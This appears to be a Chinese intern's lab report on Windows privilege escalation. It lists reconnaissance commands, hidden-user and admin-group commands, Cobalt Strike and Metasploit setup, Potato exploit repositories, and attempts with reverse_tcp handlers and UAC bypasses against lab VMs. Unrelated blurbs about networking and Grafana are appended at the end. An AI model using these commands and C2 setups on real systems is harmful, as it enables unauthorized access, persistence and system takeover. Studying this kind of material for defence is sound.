实习第九天报告(9.5)

目录

知识点

Windows相关知识

Windows下信息收集

Windows权限

Windows下管理用户组

Windows任务计划程序

CS安装配置

MSF安装配置

手工提权思路

土豆大全

提权实操

CS插件提权

各类土豆手工提权

GodPotato

PetitPotato

JuicyPotato

PrintNotifyPotato

MSF提权


知识点

Windows相关知识

Windows下信息收集

systeminfo打印系统信息
whoami获取当前用户名
whoami /priv当前账户权限
ipconfig网络配置信息
ipconfig /displaydns显示DNS缓存
arp -a打印arp表
net user列出用户
net user username关于用户的信息
net localgroup列出所有组
net localgroup GROUP关于指定组的信息
tasklist /svc列出进程列表
net start列出启动的服务
ver操作系统版本类型

Windows权限

System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。
Administrators:管理员组,具有对计算机进行完全访问和操作的权限。
Users:用户组,一般用户的默认组别,拥有较低的系统权限。
Guests:访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。
Backup Operators:备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。
Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。

Windows的默认用户账户
默认用户账户含义说明
Administrator管理员用户管理计算机(域)的内置帐户(默认禁用)
DefaultAccount默认账户系统管理的用户帐户(默认禁用)
defaultuser0默认用户(默认禁用)
Guest来宾用户提供给访客人员使用(默认禁用)
WDAGUtilityAccountWindows Defender用户系统为 Windows Defender 应用程序防护方案管理和使用的用户帐户(默认禁用)
与windows组件关联的用户账户
Windows组件关联的用户含义说明
System本地系统用户为windows的核心组件访问文件等资源提供权限
Local Service本地服务用户预设的拥有最小权限的本地账户
Network Service网络服务用户具有运行网络服务权限的计算机账户

拥有的权限大小:System > Administrator > User > Guest

Windows下管理用户组

新增、删除用户

net user 用户名 /add/del

新增、删除隐藏用户

net user 用户名$ /add/del

新增、删除用户组

net localgroup 组名 /add/del

添加用户到用户组、从用户组中删除用户

net localgroup 组名 用户名 /add/del

将普通用户添加到管理员用户(提权)

net localgroup Administrators 用户名 /add

Windows任务计划程序

系统自带的计划任务是一款不可缺少的重要工具之一,我们可以通过计划任务自定义设置这行任务,比如运行软件、系统关机等

任务计划程序在windows绝大多数版本都是系统自带,可以通过一下入口找到,以本机为例

创建任务

其中创建任务分创建基本任务和创建任务,这两者本身并没有区别,只是创建的过程,一个是可以最简化的任务创建方式,一个是完整的创建窗口页面,所以这次只介绍创建任务,他本身就包含了创建基本任务。

schtasks命令:

    schtasks /create /tn "My Daily Script" /tr W:\Users\asus\Desktop\1111.txt /sc daily /st 09:00 /rl HIGHEST /f
	# 查询指定名称计划任务
	schtasks /query | findstr "My Daily Script"
	# 删除指定名称计划任务
	schtasks /delete /tn "My Daily Script" /f
	# 查询所有计划任务
	schtasks /query

# 创建计划任务:/create
	1.每天固定时间,以普通权限启动notepad.exe
	schtasks /create /tn testservicel /sc daily /st 01:02 /tr notepad.exe
	2.每天固定时间,以system权限启动notepad.exe
	schtasks /create /tn testservice2 /sc daily /st 01:02 /tr notepad.exe /rl highest
# 查看计划任务:/query
schtasks /query /tn testservicel
# 修改计划任务:/change
schtasks /change /tn "testservicel" /st 14:00
# 删除计划任务:/delete
schtasks /delete /tn testservicel [f]

更多详细内容请看掌握 Windows 10 中的内置任务计划程序:分步指南

CS安装配置

Cobalt Strike 是一款专业的渗透测试和红队操作工具,旨在帮助安全专家模拟真实的攻击场景。它拥有强大的命令与控制(C2)功能、丰富的后渗透模块和灵活的脚本支持,使其成为安全评估和攻击模拟的重要工具。在高级渗透测试和红队操作领域,Cobalt Strike提供了丰富的功能和强大的模块,用于模拟高级持续性威胁(APT),执行复杂的攻击链条,并帮助组织评估和提升其安全防护能力

下载CobaltStrike后解压,将Server文件夹复制到vps中,并使用命令给予执行权限:

chmod +x teamserver
chmod +x TeamServerImage

使用命令Server端启动命令

./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD]
<host> 必需参数 团队服务器IP
<password> 必需参数 连接服务器的密码
[/path/to/c2.profile] 可选参数 指定C2通信配置文件
[YYYY-MM-DD] 可选参数 所有payload的终止时间

本机打开client目录下的Cobalt_Strike_CN.bat文件

使用vpn地址以及设置的密码登录

进入主界面后,设置监听器listener

然后选择有效载荷,监听器选择listener1,生成Windows可执行文件beacon_x64.exe

双击可执行文件,可以发现视图中多了一项

设置sleep为1s

测试VNC交互功能,如图,成功连接

安装CS插件,添加如下插件,方便后续进行提权操作

MSF安装配置

安装MSF

一句话安装

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

安装完成后,使用命令msfconsole启用框架,查看开始界面

其他基本使用命令如下:

msfconsole										    #进入框架
search  ms17_010                                    # 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue        # 使用use进入模块
info     										    #使用info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp    	#设置攻击载荷
show options    									#查看模块需要配置的参数
set  rhosts 'hostip' / rport 'port'				    #设置参数
exploit / run     								    #攻击
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

在实际提权操作中,我们使用MSF进行提权操作时,通常是先search查找网页相关漏洞,选择等级高的、较新的漏洞,use进入模块,info查看模块信息,set攻击ip和端口,开始攻击,然后getshell,获取主机信息,再针对其进行木马上传,完成相关提权操作

手工提权思路

信息收集:收集系统信息,补丁信息,杀软等。

筛选:筛选可能存在的exp,利用exp进行攻击获取权限

EXP获取:

​​​​​​https://github.com/Ascotbe/Kernelhub
http://kernelhub.ascotbe.com/Windows/Docs/#/
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/nomi-sec/PoC-in-GitHub
https://gitlab.com/exploit-database/exploitdb

土豆大全

各类土豆下载:

烂土豆https://github.com/BeichenDream/BadPotato
神土豆https://github.com/BeichenDream/GodPotato
甜土豆https://github.com/CCob/SweetPotato
糖土豆https://github.com/klezVirus/CandyPotato
流氓土豆https://github.com/antonioCoco/RoguePotato
多重土豆https://github.com/S3cur3Th1sSh1t/MultiPotato
拉丝曼土豆https://github.com/crisprss/RasmanPotato
小土豆https://github.com/wh0amitz/PetitPotato
多汁土豆https://github.com/antonioCoco/JuicyPotatoNG
打印土豆https://github.com/BeichenDream/PrintNotifyPotato
强迫土豆https://github.com/Prepouce/CoercedPotato

提权实操

CS插件提权

将之前CS生成的可执行文件复制到WinServer2012虚拟机内,双击运行

可以看到本机CS内多了一条虚拟机会话,同样将回连间隔设置为1s

使用CS插件对虚拟机进行提权

JuicyPotato提权成功,但创建会话失败

MS16-032提权成功,且成功创建会话

在会话交互里使用shell whoami命令查看权限,成功

MS16-135提权成功,且成功创建会话

在会话交互里使用shell whoami命令查看权限,成功

各类土豆手工提权

GodPotato

Win10

GodPotato-NET4.exe:失败

GodPotato-NET35.exe:失败

GodPotato-NET2.exe:失败

WinServer2012

GodPotato-NET4.exe:失败

GodPotato-NET35.exe:失败

GodPotato-NET2.exe:失败

PetitPotato

Win10

失败

WinServer2012

失败

JuicyPotato

Win10

失败

WinServer2012

PrintNotifyPotato

Win10

三个版本均失败

WinServer2012

三个版本均失败

MSF提权

vps执行命令生成木马

将生成的木马文件msf.exe通过SFTP传到主机,再使用u盘从主机存到虚拟机WinServer2012

vps上执行命令开始监听

msfconsole    #启动msf
use exploit/multi/handler    #使用指定漏洞模块
set payload windows/meterpreter/reverse_tcp  	# 配置有效载荷
set lport 6666							# 配置监听端⼝
set lhost 0.0.0.0		# 配置监听地址
run # 开始监听
wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

在win server 2012虚拟机中双击上面生成的msf.exe,vps这边就会显示建立会话成功

执行命令,找补丁,可能由于是才装的虚拟机,结果一个补丁都没找到

使用提权模块查找漏洞

完成后查看结果,可以看到绿色的就是可以利用的漏洞

这里我们选择挨个尝试可以利用的漏洞进行提权,每个都是同样的操作,进入框架、设置参数开始攻击,以下是各个漏洞提权结果

cve_2020_0787_bits_arbitrary_file_move:会话创建失败,提权失败

bypassuac_eventvwr:无会话创建,提权失败

bypassuac_sluihijack:无会话创建,提权失败

ms16_032_secondary_logon_handle_privesc:无会话创建,提权失败

ikeext_service:无会话创建,提权失败

tokenmagic:执行成功,且成功上传文件

查看虚拟机,文件成功上传

返回,getshell,执行刚刚上传的文件,发现提权失败,而且文件被删了,果然msf不好用QAQ,由于这里实在没有找到合适可用的提权木马,这里我们选择上传CS木马,再在CS里进行提权,上传CS默认木马

启动CS,开始监听

在msf上启用shell,运行cs.exe

在cs里可以看到winserver2012已成功上线

设置回连间隔为1s,使用插件提权,成功提权并创立会话,至此完成msf+CS联合提权

在园区网建设过程中,我们常常面临诸多实际挑战,例如网络设计、IP规划、成本控制以及项目管理等。而名为“园区网的真实案例.zip”的压缩包文件提供了大量实用资源,包括真实园区网案例、综合实验拓扑图、相关脚本和项目需求分析等,这些资料对于理解和实践园区网建设具有重要意义。我们重点关注其中的“园区网综合实验”部分。 园区网是在学校、企业或政府机构等相对封闭区域内构建的网络,旨在为区域内用户提供高效、安全的数据通信服务。综合实验则是为了模拟真实环境,帮助学习者掌握园区网设计的关键技术和步骤,通常涵盖网络设备选择与配置、VLAN划分、路由协议应用、QoS策略设定以及安全防护措施等内容。压缩包中的“最终”文件可能包含了项目实施的最终成果,如经过验证的网络设计方案、配置脚本或项目总结报告,这些资料有助于我们将理论知识转化为实际可执行的方案。 “命令”文件则可能包含了用于配置网络设备的CLI指令,涉及交换机和路由器的基本配置,如VLAN设置、端口安全、静态路由或动态路由协议(如OSPF、RIP等)。通过研究这些命令,我们可以学习如何根据不同场景正确配置网络设备,以满足业务需求。 IP规划是园区网建设中的关键任务,合理的IP规划能够避免地址冲突,便于管理和维护。案例中可能会展示如何根据园区规模、功能区划分及未来扩展需求制定合适的IP地址策略。成本控制同样重要,园区网建设不仅涉及设备购置费用,还包括安装、运维、升级等长期成本。案例可能探讨如何在满足功能需求的同时,选择性价比高的设备,优化布线方案,并通过节能技术降低运营成本。 项目总结则是对整个实施过程的回顾,涵盖遇到的问题、解决方案、经验教训及改进点,对提升项目管理能力和问题解决技巧非常有帮助。这个压缩包的内容全面覆盖了园区网设计、建设和管理的多个方面,是学习和实践网络技术的宝贵资源。通过深入研究这些材料,我们可以提升网络规划和实施能力,更好
内容概要:本文档《Grafana运维指南:从入门到精通》详细介绍了Grafana这一开源度量分析和可视化工具的各个方面。首先解释了Grafana在数据监控和分析中的重要性,强调其开源、可视化、多数据源支持、告警功能、灵活的仪表盘管理和丰富的插件生态系统等特点。接着,文档逐步讲解了Grafana的安装与配置,包括系统准备、初始配置和数据源配置等步骤。随后,深入探讨了数据源管理、仪表盘操作、插件使用等核心功能,提供了详细的配置和使用指南。最后,文档介绍了性能优化、安全管理、日志分析等日常运维要点,并通过一个实际案例展示了Grafana在大型电商平台运维中的应用价值。 适用人群:适用于运维人员、系统管理员、开发人员以及任何需要进行数据监控和分析的专业人士,尤其是那些对Grafana有一定了解或有兴趣深入了解的人群。 使用场景及目标:①帮助用户掌握Grafana的安装配置和基本使用方法;②指导用户如何整合多种数据源,创建和管理仪表盘;③提供性能优化、安全管理等方面的建议,确保Grafana在实际应用中的高效稳定运行;④通过实际案例分享,展示Grafana在复杂业务环境中的应用效果,提升用户对Grafana的理解和应用能力。 其他说明:本文档不仅涵盖了Grafana的基础知识和技术细节,还结合实际案例,帮助读者更好地理解和应用Grafana。建议读者在学习过程中结合实际操作,通过实践加深对Grafana的理解。此外,文档鼓励读者参与社区交流,分享经验和心得,共同进步。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值